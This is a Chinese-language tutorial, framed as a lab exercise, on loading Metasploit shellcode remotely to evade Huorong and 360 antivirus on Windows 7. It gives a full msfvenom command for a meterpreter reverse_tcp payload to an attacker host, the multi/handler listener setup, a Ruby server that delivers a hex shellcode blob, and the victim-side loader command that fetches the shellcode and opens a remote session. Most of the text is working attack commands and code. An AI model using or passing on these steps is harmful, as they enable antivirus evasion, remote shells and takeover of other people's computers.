msf shellcode分离免杀技术

Table of Contents

一般的shellcode是直接放在程序里面执行,分离免杀是将恶意代码放置在程序本身之外的一种加载方式。本实验轻松绕过最新版火rong和360

实验 #

实验环境

  • 受害机:win7(192.168.111.135)安装了最新版火绒和360
  • 攻击机:kali  (192.168.111.132)

最新版火绒和360

1. ⾸先kali使⽤MSF⽣成⼀个shellcode,混淆后的:LPORT只能⽤53

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=53 -b '\x00' -f c |grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"

生成如下shellcode代码

2. kali开启监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.111.132
set lport 53
#持续监听
set ExitOnSession false   
exploit -j

3. 使用shellcode.rb

shellcode.rb内容如下,将msf生成的shellcode替换掉client.write中的值

require 'socket'
if ARGV.empty?
	puts "Usage:"
	puts "Micropoor.rb port"
	exit
end

PORT = ARGV.first.to_i

def handle_connection(client)
	puts "Payload is on-line #{client}"

	client.write("bba5835fcbdbd0d97424f45a29c9b159315a14035a1483eafc4776a32308795cb476f3b985a467c9b478e39f34f3a10bce716e3b673f4872788e54d8ba912823ef7110ece27055ba899d0b6af933bc1fbf8fbdcfcbafc56a0b5b7a745c28ca6ed776eb8f34d66e46ceea3968d0998e012f4bdfd5f1bc2d7af085166286fd641f91c617fb14d8b0888f3c405c49b74e291d9f52acf2946f25f57ae67dd25ea2267bc70e888417f675215c1563559de58c0b092941b4c925d2c7fbea4840b7635797ce64684768e49668882c5d3cd846743db39679e8299dedd305ce69bb57117209def72221b0a7829170186bf87f478b03aae026ec0258df950f127e599a5e40d12e9e0f125b8c7845a34c79e0a3267da2f4de7f9332417ff641867f8773fcb61d3b6ab7f1bb6ae19bbb0255f8e8379ad59deb0fd6f75887bef587ef6006e27366f8705ccf908adcef60e1dcbf08fef330f8ffd918908a8feb018a85aa9f8b2a7710f14388d1064aedd2067213efd04b612ee1ef7a0544591165da9930")
	client.close
end

socket = TCPServer.new('0.0.0.0', PORT)
puts "Listening on #{PORT}. "

while client = socket.accept
	Thread.new { handle_connection(client)}
end

4. kali运行shellcode.rb

运行此,是为了能让外网下载到shellcode,端口随便

ruby shellcode.rb 8080

5. 受害机器win7运行shellcode加载器远程加载shellcode并上线msf

shellcode_x86.exe可以到github上下载(该工具为shellcode加载器,不会被杀)

shellcode_x86.exe rb的端⼝ MSF-IP 
shellcode_x86.exe 8080 192.168.111.132

shellcode加载器远程加载shellcode,此时火绒和360无任何反应。运行此shellcode的窗口得一直保持这样,如果我们关了该窗口则会掉线

msf成功上线

总结

msf生成混淆shellcode,rb开启监听,目标远程加载shellcode,msf上线